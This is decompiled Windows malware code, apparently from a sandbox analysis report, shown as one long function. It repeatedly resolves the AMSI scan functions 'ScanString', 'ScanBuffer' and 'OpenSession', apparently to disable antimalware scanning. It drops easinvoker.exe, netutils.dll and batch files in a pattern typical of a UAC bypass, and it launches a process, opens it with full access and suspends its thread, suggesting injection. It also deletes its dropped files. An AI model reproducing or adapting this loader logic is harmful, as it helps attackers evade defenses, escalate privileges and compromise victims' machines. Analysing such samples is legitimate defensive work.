				intOrPtr _t1817;
				intOrPtr _t1818;
				intOrPtr _t1819;
				intOrPtr _t1820;
				intOrPtr _t1821;
				intOrPtr _t1823;
				intOrPtr _t1824;
				intOrPtr _t1825;
				intOrPtr _t1826;
				intOrPtr _t1827;
				intOrPtr _t1828;
				intOrPtr _t1829;
				intOrPtr _t1830;
				intOrPtr _t1831;
				intOrPtr _t1833;
				intOrPtr _t1834;
				intOrPtr _t1835;
				intOrPtr _t1836;
				intOrPtr _t1837;
				intOrPtr _t1838;
				intOrPtr _t1839;
				intOrPtr _t1840;
				intOrPtr _t1841;
				intOrPtr _t1842;
				intOrPtr _t1843;
				intOrPtr _t1844;
				intOrPtr _t1845;
				intOrPtr _t1846;
				intOrPtr _t1847;
				intOrPtr _t1848;
				intOrPtr _t1849;
				intOrPtr _t1850;
				intOrPtr _t1851;
				intOrPtr _t1852;
				intOrPtr _t1853;
				intOrPtr _t1856;
				intOrPtr _t1857;
				intOrPtr _t1858;
				intOrPtr _t1859;
				intOrPtr _t1860;
				intOrPtr _t1861;
				intOrPtr _t1862;
				intOrPtr _t1863;
				intOrPtr _t1864;
				intOrPtr _t1865;
				intOrPtr _t1866;
				intOrPtr _t1867;
				intOrPtr _t1868;
				intOrPtr _t1869;
				intOrPtr _t1870;
				intOrPtr _t1871;
				intOrPtr _t1873;
				intOrPtr _t1874;
				intOrPtr _t1875;
				intOrPtr _t1877;
				void* _t1882;
				void* _t1889;
				void* _t1894;
				void* _t1899;
				intOrPtr _t1900;
				void* _t1905;
				void* _t1910;
				void* _t1919;
				void* _t1924;
				intOrPtr _t1925;
				void* _t1930;
				void* _t1935;
				void* _t1940;
				void* _t1947;
				void* _t1952;
				intOrPtr _t1953;
				void* _t1958;
				void* _t1963;
				void* _t1972;
				void* _t1977;
				intOrPtr _t1978;
				void* _t1983;
				void* _t1988;
				void* _t1994;
				void* _t1999;
				void* _t2005;
				void* _t2010;
				void* _t2016;
				void* _t2021;
				void* _t2027;
				void* _t2032;
				void* _t2037;
				void* _t2040;
				void* _t2043;
				void* _t2048;
				void* _t2051;
				void* _t2054;
				void* _t2059;
				void* _t2064;
				void* _t2069;
				void* _t2074;
				void* _t2078;
				void* _t2083;
				void* _t2086;
				void* _t2089;
				void* _t2092;
				void* _t2097;
				void* _t2100;
				void* _t2103;
				void* _t2106;
				void* _t2109;
				void* _t2112;
				void* _t2115;
				void* _t2118;
				void* _t2121;
				void* _t2124;
				void* _t2127;
				void* _t2130;
				void* _t2133;
				void* _t2138;
				void* _t2141;
				void* _t2144;
				void* _t2147;
				void* _t2150;
				void* _t2153;
				void* _t2156;
				void* _t2159;
				intOrPtr _t2160;
				intOrPtr _t2171;
				intOrPtr _t2173;
				void* _t2184;
				void* _t2192;
				void* _t2202;
				void* _t2207;
				void* _t2213;
				void* _t2218;
				void* _t2225;
				void* _t2230;
				void* _t2235;
				void* _t2240;
				void* _t2245;
				void* _t2250;
				void* _t2255;
				void* _t2260;
				void* _t2265;
				void* _t2271;
				void* _t2276;
				void* _t2282;
				void* _t2289;
				void* _t2298;
				void* _t2307;
				void* _t2308;

				_t2314 = __fp0;
				_t2297 = __esi;
				_t2296 = __edi;
				_t1809 = __ebx;
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x5cc, E02174D64( *((intOrPtr*)(_t2298 - 0x5d0))));
				_push( *((intOrPtr*)(_t2298 - 0x5cc)));
				_t1816 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x5d8, _t1816, 0x218e77c);
				E02174A98(_t2298 - 0x5d4, E02174D64( *((intOrPtr*)(_t2298 - 0x5d8))));
				_pop(_t1882);
				E02183690( *((intOrPtr*)(_t2298 - 0x5d4)), __ebx, _t1882, __esi);
				_push( *0x2194b84);
				_push(0x218e8d8);
				_push("easinvoker.exe");
				E02174C24();
				E02174A98(0x21949c8, E02174D64( *((intOrPtr*)(_t2298 - 0x5dc))));
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x5e0, E02174D64( *((intOrPtr*)(_t2298 - 0x5e4))));
				_push( *((intOrPtr*)(_t2298 - 0x5e0)));
				_t1817 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x5ec, _t1817, 0x218e77c);
				E02174A98(_t2298 - 0x5e8, E02174D64( *((intOrPtr*)(_t2298 - 0x5ec))));
				_pop(_t1889);
				E02183690( *((intOrPtr*)(_t2298 - 0x5e8)), __ebx, _t1889, __esi);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x5f0, E02174D64( *((intOrPtr*)(_t2298 - 0x5f4))));
				_push( *((intOrPtr*)(_t2298 - 0x5f0)));
				_t1818 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x5fc, _t1818, 0x218e77c);
				E02174A98(_t2298 - 0x5f8, E02174D64( *((intOrPtr*)(_t2298 - 0x5fc))));
				_pop(_t1894);
				E02183690( *((intOrPtr*)(_t2298 - 0x5f8)), _t1809, _t1894, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x600, E02174D64( *((intOrPtr*)(_t2298 - 0x604))));
				_push( *((intOrPtr*)(_t2298 - 0x600)));
				_t1819 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x60c, _t1819, 0x218e77c);
				E02174A98(_t2298 - 0x608, E02174D64( *((intOrPtr*)(_t2298 - 0x60c))));
				_pop(_t1899);
				E02183690( *((intOrPtr*)(_t2298 - 0x608)), _t1809, _t1899, _t2297);
				_t1900 =  *0x21949c8; // 0x0
				_t674 =  *0x2194b38; // 0x0
				E021889A4(_t674, _t1809, _t1900, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x610, E02174D64( *((intOrPtr*)(_t2298 - 0x614))));
				_push( *((intOrPtr*)(_t2298 - 0x610)));
				_t1820 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x61c, _t1820, 0x218e77c);
				E02174A98(_t2298 - 0x618, E02174D64( *((intOrPtr*)(_t2298 - 0x61c))));
				_pop(_t1905);
				E02183690( *((intOrPtr*)(_t2298 - 0x618)), _t1809, _t1905, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x620, E02174D64( *((intOrPtr*)(_t2298 - 0x624))));
				_push( *((intOrPtr*)(_t2298 - 0x620)));
				_t1821 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x62c, _t1821, 0x218e77c);
				E02174A98(_t2298 - 0x628, E02174D64( *((intOrPtr*)(_t2298 - 0x62c))));
				_pop(_t1910);
				E02183690( *((intOrPtr*)(_t2298 - 0x628)), _t1809, _t1910, _t2297);
				_push( *0x2194b84);
				_push(0x218e8d8);
				_push( *0x2194bd4);
				_push("O.bat");
				E02174C24();
				E02174A98(0x21949d0, E02174D64( *((intOrPtr*)(_t2298 - 0x630))));
				E0218884C(0x2190b6c, _t2298 - 0x634, 0x19a);
				E021748F4(0x2194ba4,  *((intOrPtr*)(_t2298 - 0x634)));
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x638, E02174D64( *((intOrPtr*)(_t2298 - 0x63c))));
				_push( *((intOrPtr*)(_t2298 - 0x638)));
				_t1823 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x644, _t1823, 0x218e77c);
				E02174A98(_t2298 - 0x640, E02174D64( *((intOrPtr*)(_t2298 - 0x644))));
				_pop(_t1919);
				E02183690( *((intOrPtr*)(_t2298 - 0x640)), _t1809, _t1919, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x648, E02174D64( *((intOrPtr*)(_t2298 - 0x64c))));
				_push( *((intOrPtr*)(_t2298 - 0x648)));
				_t1824 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x654, _t1824, 0x218e77c);
				E02174A98(_t2298 - 0x650, E02174D64( *((intOrPtr*)(_t2298 - 0x654))));
				_pop(_t1924);
				E02183690( *((intOrPtr*)(_t2298 - 0x650)), _t1809, _t1924, _t2297);
				_t1925 =  *0x21949d0; // 0x0
				_t741 =  *0x2194ba4; // 0x0
				E021889A4(_t741, _t1809, _t1925, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x658, E02174D64( *((intOrPtr*)(_t2298 - 0x65c))));
				_push( *((intOrPtr*)(_t2298 - 0x658)));
				_t1825 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x664, _t1825, 0x218e77c);
				E02174A98(_t2298 - 0x660, E02174D64( *((intOrPtr*)(_t2298 - 0x664))));
				_pop(_t1930);
				E02183690( *((intOrPtr*)(_t2298 - 0x660)), _t1809, _t1930, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x668, E02174D64( *((intOrPtr*)(_t2298 - 0x66c))));
				_push( *((intOrPtr*)(_t2298 - 0x668)));
				_t1826 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x674, _t1826, 0x218e77c);
				E02174A98(_t2298 - 0x670, E02174D64( *((intOrPtr*)(_t2298 - 0x674))));
				_pop(_t1935);
				E02183690( *((intOrPtr*)(_t2298 - 0x670)), _t1809, _t1935, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x678, E02174D64( *((intOrPtr*)(_t2298 - 0x67c))));
				_push( *((intOrPtr*)(_t2298 - 0x678)));
				_t1827 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x684, _t1827, 0x218e77c);
				E02174A98(_t2298 - 0x680, E02174D64( *((intOrPtr*)(_t2298 - 0x684))));
				_pop(_t1940);
				E02183690( *((intOrPtr*)(_t2298 - 0x680)), _t1809, _t1940, _t2297);
				_push( *0x2194b84);
				_push(0x218e8d8);
				_push("netutils.dll");
				E02174C24();
				E02174A98(0x21949cc, E02174D64( *((intOrPtr*)(_t2298 - 0x688))));
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x68c, E02174D64( *((intOrPtr*)(_t2298 - 0x690))));
				_push( *((intOrPtr*)(_t2298 - 0x68c)));
				_t1828 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x698, _t1828, 0x218e77c);
				E02174A98(_t2298 - 0x694, E02174D64( *((intOrPtr*)(_t2298 - 0x698))));
				_pop(_t1947);
				E02183690( *((intOrPtr*)(_t2298 - 0x694)), _t1809, _t1947, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x69c, E02174D64( *((intOrPtr*)(_t2298 - 0x6a0))));
				_push( *((intOrPtr*)(_t2298 - 0x69c)));
				_t1829 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x6a8, _t1829, 0x218e77c);
				E02174A98(_t2298 - 0x6a4, E02174D64( *((intOrPtr*)(_t2298 - 0x6a8))));
				_pop(_t1952);
				E02183690( *((intOrPtr*)(_t2298 - 0x6a4)), _t1809, _t1952, _t2297);
				_t1953 =  *0x21949cc; // 0x0
				_t818 =  *0x2194b3c; // 0x0
				E021889A4(_t818, _t1809, _t1953, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x6ac, E02174D64( *((intOrPtr*)(_t2298 - 0x6b0))));
				_push( *((intOrPtr*)(_t2298 - 0x6ac)));
				_t1830 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x6b8, _t1830, 0x218e77c);
				E02174A98(_t2298 - 0x6b4, E02174D64( *((intOrPtr*)(_t2298 - 0x6b8))));
				_pop(_t1958);
				E02183690( *((intOrPtr*)(_t2298 - 0x6b4)), _t1809, _t1958, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98(_t2298 - 0x6bc, E02174D64( *((intOrPtr*)(_t2298 - 0x6c0))));
				_push( *((intOrPtr*)(_t2298 - 0x6bc)));
				_t1831 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x6c8, _t1831, 0x218e77c);
				E02174A98(_t2298 - 0x6c4, E02174D64( *((intOrPtr*)(_t2298 - 0x6c8))));
				_pop(_t1963);
				E02183690( *((intOrPtr*)(_t2298 - 0x6c4)), _t1809, _t1963, _t2297);
				_push( *0x2194b84);
				_push(0x218e8d8);
				_push("KDECO.bat");
				E02174C24();
				E02174A98(0x2194bac, E02174D64( *((intOrPtr*)(_t2298 - 0x6cc))));
				E0218884C(0x2190ad0, _t2298 - 0x6d0, 0x9a);
				E021748F4(0x2194ba4,  *((intOrPtr*)(_t2298 - 0x6d0)));
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x6d4, E02174D64( *((intOrPtr*)(_t2298 - 0x6d8))));
				_push( *((intOrPtr*)(_t2298 - 0x6d4)));
				_t1833 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x6e0, _t1833, 0x218e77c);
				E02174A98(_t2298 - 0x6dc, E02174D64( *((intOrPtr*)(_t2298 - 0x6e0))));
				_pop(_t1972);
				E02183690( *((intOrPtr*)(_t2298 - 0x6dc)), _t1809, _t1972, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x6e4, E02174D64( *((intOrPtr*)(_t2298 - 0x6e8))));
				_push( *((intOrPtr*)(_t2298 - 0x6e4)));
				_t1834 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x6f0, _t1834, 0x218e77c);
				E02174A98(_t2298 - 0x6ec, E02174D64( *((intOrPtr*)(_t2298 - 0x6f0))));
				_pop(_t1977);
				E02183690( *((intOrPtr*)(_t2298 - 0x6ec)), _t1809, _t1977, _t2297);
				_t1978 =  *0x2194bac; // 0x0
				_t885 =  *0x2194ba4; // 0x0
				E021889A4(_t885, _t1809, _t1978, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x6f4, E02174D64( *((intOrPtr*)(_t2298 - 0x6f8))));
				_push( *((intOrPtr*)(_t2298 - 0x6f4)));
				_t1835 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x700, _t1835, 0x218e77c);
				E02174A98(_t2298 - 0x6fc, E02174D64( *((intOrPtr*)(_t2298 - 0x700))));
				_pop(_t1983);
				E02183690( *((intOrPtr*)(_t2298 - 0x6fc)), _t1809, _t1983, _t2297);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x704, E02174D64( *((intOrPtr*)(_t2298 - 0x708))));
				_push( *((intOrPtr*)(_t2298 - 0x704)));
				_t1836 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x710, _t1836, 0x218e77c);
				E02174A98(_t2298 - 0x70c, E02174D64( *((intOrPtr*)(_t2298 - 0x710))));
				_pop(_t1988);
				E02183690( *((intOrPtr*)(_t2298 - 0x70c)), _t1809, _t1988, _t2297);
				_t915 =  *0x21949d0; // 0x0
				E02174A98(_t2298 - 0x714, E02174D64(_t915));
				_t920 = E021780F8( *((intOrPtr*)(_t2298 - 0x714)));
				_t2300 = _t920;
				if(_t920 != 0) {
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98(_t2298 - 0x718, E02174D64( *((intOrPtr*)(_t2298 - 0x71c))));
					_push( *((intOrPtr*)(_t2298 - 0x718)));
					_t1875 =  *0x2194bb0; // 0x3e01b38
					E02174BB0(_t2298 - 0x724, _t1875, 0x218e77c);
					E02174A98(_t2298 - 0x720, E02174D64( *((intOrPtr*)(_t2298 - 0x724))));
					_pop(_t2282);
					E02183690( *((intOrPtr*)(_t2298 - 0x720)), _t1809, _t2282, _t2297);
					_t1741 =  *0x21949d0; // 0x0
					E02174D64(_t1741);
					E021737AC();
					E02188A30(_t2298 - 0x824, _t1809, 0, 0x218e9f8, __edi, _t2297, _t2300, __fp0);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98(_t2298 - 0x828, E02174D64( *((intOrPtr*)(_t2298 - 0x82c))));
					_push( *((intOrPtr*)(_t2298 - 0x828)));
					_t1877 =  *0x2194bb0; // 0x3e01b38
					E02174BB0(_t2298 - 0x834, _t1877, 0x218e77c);
					E02174A98(_t2298 - 0x830, E02174D64( *((intOrPtr*)(_t2298 - 0x834))));
					_pop(_t2289);
					E02183690( *((intOrPtr*)(_t2298 - 0x830)), _t1809, _t2289, _t2297);
					Sleep(0x1388);
					_t1761 =  *0x21949c8; // 0x0
					E02174A98(_t2298 - 0x838, E02174D64(_t1761));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x838));
					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t1769 =  *0x2194b44; // 0x0
					E02174A98(_t2298 - 0x83c, E02174D64(_t1769));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x83c));
					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t1777 =  *0x2194b48; // 0x0
					E02174A98(_t2298 - 0x840, E02174D64(_t1777));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x840));
					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t1785 =  *0x2194bac; // 0x0
					E02174A98(_t2298 - 0x844, E02174D64(_t1785));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x844));
					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t1793 =  *0x21949d0; // 0x0
					E02174A98(_t2298 - 0x848, E02174D64(_t1793));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x848));
					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t1801 =  *0x21949cc; // 0x0
					E02174A98(_t2298 - 0x84c, E02174D64(_t1801));
					_t1809 =  *((intOrPtr*)(_t2298 - 0x84c));
					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x84c));
					_t1807 = DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
					asm("sbb eax, eax");
					_t2307 = _t1807 + 1;
				}
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98(_t2298 - 0x850, E02174D64( *((intOrPtr*)(_t2298 - 0x854))));
				_push( *((intOrPtr*)(_t2298 - 0x850)));
				_t1837 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x85c, _t1837, 0x218e77c);
				E02174A98(_t2298 - 0x858, E02174D64( *((intOrPtr*)(_t2298 - 0x85c))));
				_pop(_t1994); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x858)), _t1809, _t1994, _t2297); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98(_t2298 - 0x860, E02174D64( *((intOrPtr*)(_t2298 - 0x864))));
				_push( *((intOrPtr*)(_t2298 - 0x860)));
				_t1838 =  *0x2194bb0; // 0x3e01b38
				E02174BB0(_t2298 - 0x86c, _t1838, 0x218e77c);
				E02174A98(_t2298 - 0x868, E02174D64( *((intOrPtr*)(_t2298 - 0x86c))));
				_pop(_t1999); // executed
				E02183690( *((intOrPtr*)(_t2298 - 0x868)), _t1809, _t1999, _t2297);
				_t949 =  *0x2194bc4; // 0x3e01b48
				E02174CB0(_t949, 0x218e8cc);
				if(_t2307 == 0) {
					_t1489 =  *0x2194bc0; // 0x0
					E02174CB0(_t1489, 0x218e8cc);
					if(_t2307 != 0) {
						_t1491 =  *0x2194bc8; // 0x0
						E02174CB0(_t1491, 0x218e8cc);
						if(_t2307 != 0) {
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x870, E02174D64( *((intOrPtr*)(_t2298 - 0x874))));
							_push( *((intOrPtr*)(_t2298 - 0x870)));
							_t1858 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x87c, _t1858, 0x218e77c);
							E02174A98(_t2298 - 0x878, E02174D64( *((intOrPtr*)(_t2298 - 0x87c))));
							_pop(_t2202); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x878)), _t1809, _t2202, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x880, E02174D64( *((intOrPtr*)(_t2298 - 0x884))));
							_push( *((intOrPtr*)(_t2298 - 0x880)));
							_t1859 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x88c, _t1859, 0x218e77c);
							E02174A98(_t2298 - 0x888, E02174D64( *((intOrPtr*)(_t2298 - 0x88c))));
							_pop(_t2207); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x888)), _t1809, _t2207, _t2297); // executed
							_t1860 =  *0x2194b34; // 0x3dfa858
							E02174BB0(_t2298 - 0x890, _t1860, "C:\\Windows\\System32\\");
							WinExec(E02174D64( *((intOrPtr*)(_t2298 - 0x890))), 0); // executed
							Sleep(0x1f4); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x894, E02174D64( *((intOrPtr*)(_t2298 - 0x898))));
							_push( *((intOrPtr*)(_t2298 - 0x894)));
							_t1861 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8a0, _t1861, 0x218e77c);
							E02174A98(_t2298 - 0x89c, E02174D64( *((intOrPtr*)(_t2298 - 0x8a0))));
							_pop(_t2213); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x89c)), _t1809, _t2213, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x8a4, E02174D64( *((intOrPtr*)(_t2298 - 0x8a8))));
							_push( *((intOrPtr*)(_t2298 - 0x8a4)));
							_t1862 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8b0, _t1862, 0x218e77c);
							E02174A98(_t2298 - 0x8ac, E02174D64( *((intOrPtr*)(_t2298 - 0x8b0))));
							_pop(_t2218); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x8ac)), _t1809, _t2218, _t2297);
							_t1554 =  *0x2194b34; // 0x3dfa858
							E02174A98(_t2298 - 0x8b4, E02174D64(_t1554));
							E021857D0( *((intOrPtr*)(_t2298 - 0x8b4)), _t1809, 0x2194b90, _t2296, _t2297, _t2307); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x8b8, E02174D64( *((intOrPtr*)(_t2298 - 0x8bc))));
							_push( *((intOrPtr*)(_t2298 - 0x8b8)));
							_t1863 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8c4, _t1863, 0x218e77c);
							E02174A98(_t2298 - 0x8c0, E02174D64( *((intOrPtr*)(_t2298 - 0x8c4))));
							_pop(_t2225); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x8c0)), _t1809, _t2225, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x8c8, E02174D64( *((intOrPtr*)(_t2298 - 0x8cc))));
							_push( *((intOrPtr*)(_t2298 - 0x8c8)));
							_t1864 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8d4, _t1864, 0x218e77c);
							E02174A98(_t2298 - 0x8d0, E02174D64( *((intOrPtr*)(_t2298 - 0x8d4))));
							_pop(_t2230); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x8d0)), _t1809, _t2230, _t2297);
							_t1588 =  *0x2194b90; // 0xdf8
							 *0x2194b94 = OpenProcess(0x1f0fff, 0, _t1588);
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x8d8, E02174D64( *((intOrPtr*)(_t2298 - 0x8dc))));
							_push( *((intOrPtr*)(_t2298 - 0x8d8)));
							_t1865 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8e4, _t1865, 0x218e77c);
							E02174A98(_t2298 - 0x8e0, E02174D64( *((intOrPtr*)(_t2298 - 0x8e4))));
							_pop(_t2235); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x8e0)), _t1809, _t2235, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x8e8, E02174D64( *((intOrPtr*)(_t2298 - 0x8ec))));
							_push( *((intOrPtr*)(_t2298 - 0x8e8)));
							_t1866 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x8f4, _t1866, 0x218e77c);
							E02174A98(_t2298 - 0x8f0, E02174D64( *((intOrPtr*)(_t2298 - 0x8f4))));
							_pop(_t2240); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x8f0)), _t1809, _t2240, _t2297);
							_t1618 =  *0x2194b94; // 0x850
							NtSuspendThread(_t1618); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x8f8, E02174D64( *((intOrPtr*)(_t2298 - 0x8fc))));
							_push( *((intOrPtr*)(_t2298 - 0x8f8)));
							_t1867 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x904, _t1867, 0x218e77c);
							E02174A98(_t2298 - 0x900, E02174D64( *((intOrPtr*)(_t2298 - 0x904))));
							_pop(_t2245); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x900)), _t1809, _t2245, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x908, E02174D64( *((intOrPtr*)(_t2298 - 0x90c))));
							_push( *((intOrPtr*)(_t2298 - 0x908)));
							_t1868 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x914, _t1868, 0x218e77c);
							E02174A98(_t2298 - 0x910, E02174D64( *((intOrPtr*)(_t2298 - 0x914))));
							_pop(_t2250); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x910)), _t1809, _t2250, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
							E02174A98(_t2298 - 0x918, E02174D64( *((intOrPtr*)(_t2298 - 0x91c))));
							_push( *((intOrPtr*)(_t2298 - 0x918)));
							_t1869 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x924, _t1869, 0x218e77c);
							E02174A98(_t2298 - 0x920, E02174D64( *((intOrPtr*)(_t2298 - 0x924))));
							_pop(_t2255); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x920)), _t1809, _t2255, _t2297); // executed
							_t1663 = E0217304C(0x38c);
							_push(_t1663);
							L021858FC();
							_t2308 = _t1663;
							if(_t2308 == 0) {
								_push(0x218e77c);
								_push( *0x2194bb0);
								_push("ScanBuffer");
								E02174C24();
								E02174A98(_t2298 - 0x928, E02174D64( *((intOrPtr*)(_t2298 - 0x92c))));
								_push( *((intOrPtr*)(_t2298 - 0x928)));
								_t1870 =  *0x2194bb0; // 0x3e01b38
								E02174BB0(_t2298 - 0x934, _t1870, 0x218e77c);
								E02174A98(_t2298 - 0x930, E02174D64( *((intOrPtr*)(_t2298 - 0x934))));
								_pop(_t2260); // executed
								E02183690( *((intOrPtr*)(_t2298 - 0x930)), _t1809, _t2260, _t2297); // executed
							} else {
								E021748F4(0x2194bb8, "5E5CDDEE");
							}
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("OpenSession");
							E02174C24();
							E02174A98(_t2298 - 0x938, E02174D64( *((intOrPtr*)(_t2298 - 0x93c))));
							_push( *((intOrPtr*)(_t2298 - 0x938)));
							_t1871 =  *0x2194bb0; // 0x3e01b38
							E02174BB0(_t2298 - 0x944, _t1871, 0x218e77c);
							E02174A98(_t2298 - 0x940, E02174D64( *((intOrPtr*)(_t2298 - 0x944))));
							_pop(_t2265); // executed
							E02183690( *((intOrPtr*)(_t2298 - 0x940)), _t1809, _t2265, _t2297); // executed
							E02174DBC(0x2194b78);
							_t1694 =  *0x2194b94; // 0x850, executed
							E0218779C(_t1694, _t1809, _t2296, _t2297); // executed
							_push(0x218e77c);
							_push( *0x2194bb0);
							_push("ScanBuffer");
							E02174C24();
